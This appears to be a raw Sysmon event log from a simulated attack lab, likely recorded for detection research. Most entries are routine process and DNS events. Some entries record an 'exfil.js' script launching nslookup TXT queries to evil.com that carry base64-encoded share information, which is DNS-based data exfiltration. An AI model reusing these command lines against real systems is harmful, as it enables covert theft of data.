14:21:40.464{2E1864BB-18F4-629A-D544-000000005F02}67126108C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D444-000000005F02}5192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D544-000000005F02}6712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D444-000000005F02}5192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.432{2E1864BB-18E0-629A-6742-000000005F02}39767588C:\Windows\System32\WScript.exe{2E1864BB-18F4-629A-D444-000000005F02}5192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211921Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.448{2E1864BB-18F4-629A-D444-000000005F02}5192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlsdh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211920Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.432{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlszh.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000211919Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.890{00000000-0000-0000-0000-000000000000}6232<unknown process>-udpfalsefalse127.0.0.1-50951-false127.0.0.1-53domain 354300x8000000000000000211918Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.890{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50951- 354300x8000000000000000211917Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.890{00000000-0000-0000-0000-000000000000}6232<unknown process>-udpfalsefalse127.0.0.1-50950-false127.0.0.1-53domain 354300x8000000000000000211916Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.890{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50950- 354300x8000000000000000211915Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.889{00000000-0000-0000-0000-000000000000}6232<unknown process>-udpfalsefalse127.0.0.1-50949-false127.0.0.1-53domain 354300x8000000000000000211914Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50949- 354300x8000000000000000211913Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.889{00000000-0000-0000-0000-000000000000}6232<unknown process>-udptruefalse127.0.0.1-50949-false127.0.0.1-53domain 354300x8000000000000000211912Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.790{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50948- 354300x8000000000000000211911Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-50948-false127.0.0.1-53domain 354300x8000000000000000211910Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-50947-false127.0.0.1-53domain 354300x8000000000000000211909Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50947- 354300x8000000000000000211908Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-50947-false127.0.0.1-53domain 354300x8000000000000000211907Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-50946-false127.0.0.1-53domain 354300x8000000000000000211906Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50946- 354300x8000000000000000211905Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.789{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-50946-false127.0.0.1-53domain 354300x8000000000000000211904Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.486{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-50945-false127.0.0.1-53domain 354300x8000000000000000211903Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.486{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50945- 354300x8000000000000000211902Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-50945-false127.0.0.1-53domain 354300x8000000000000000211901Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{00000000-0000-0000-0000-000000000000}6652<unknown process>-udpfalsefalse127.0.0.1-50944-false127.0.0.1-53domain 354300x8000000000000000211900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50944- 10341000x8000000000000000211899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.401{2E1864BB-18F4-629A-D244-000000005F02}77363388C:\Windows\system32\conhost.exe{2E1864BB-18F4-629A-D344-000000005F02}1492C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-50944-false127.0.0.1-53domain 354300x8000000000000000211897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50943- 354300x8000000000000000211896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.485{00000000-0000-0000-0000-000000000000}6652<unknown process>-udptruefalse127.0.0.1-50943-false127.0.0.1-53domain 354300x8000000000000000211895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-50942-false127.0.0.1-53domain 354300x8000000000000000211894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50942- 354300x8000000000000000211893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-50941-false127.0.0.1-53domain 354300x8000000000000000211892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50941- 354300x8000000000000000211891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-50941-false127.0.0.1-53domain 354300x8000000000000000211890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.407{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-50940-false127.0.0.1-53domain 354300x8000000000000000211889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.406{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50940- 354300x8000000000000000211888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.406{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-50940-false127.0.0.1-53domain 354300x8000000000000000211887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.258{00000000-0000-0000-0000-000000000000}2932<unknown process>-udpfalsefalse127.0.0.1-50939-false127.0.0.1-53domain 354300x8000000000000000211886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.258{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50939- 354300x8000000000000000211885Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.258{00000000-0000-0000-0000-000000000000}2932<unknown process>-udptruefalse127.0.0.1-50939-false127.0.0.1-53domain 354300x8000000000000000211884Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.257{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50938- 354300x8000000000000000211883Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.257{00000000-0000-0000-0000-000000000000}2932<unknown process>-udptruefalse127.0.0.1-50938-false127.0.0.1-53domain 354300x8000000000000000211882Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.256{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50937- 354300x8000000000000000211881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.256{00000000-0000-0000-0000-000000000000}2932<unknown process>-udptruefalse127.0.0.1-50937-false127.0.0.1-53domain 354300x8000000000000000211880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-50936-false127.0.0.1-53domain 354300x8000000000000000211879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50936- 354300x8000000000000000211878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-50936-false127.0.0.1-53domain 10341000x8000000000000000211877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.385{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F4-629A-D344-000000005F02}1492C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000211876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-50935-false127.0.0.1-53domain 10341000x8000000000000000211875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50935- 10341000x8000000000000000211871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.385{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-50935-false127.0.0.1-53domain 10341000x8000000000000000211869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.385{2E1864BB-18F4-629A-D144-000000005F02}63363620C:\Windows\system32\cmd.exe{2E1864BB-18F4-629A-D344-000000005F02}1492C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000211868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.153{00000000-0000-0000-0000-000000000000}8012<unknown process>-udpfalsefalse127.0.0.1-50934-false127.0.0.1-53domain 354300x8000000000000000211867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.152{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50934- 354300x8000000000000000211866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.152{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-50934-false127.0.0.1-53domain 154100x8000000000000000211865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:40.395{2E1864BB-18F4-629A-D344-000000005F02}1492C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com 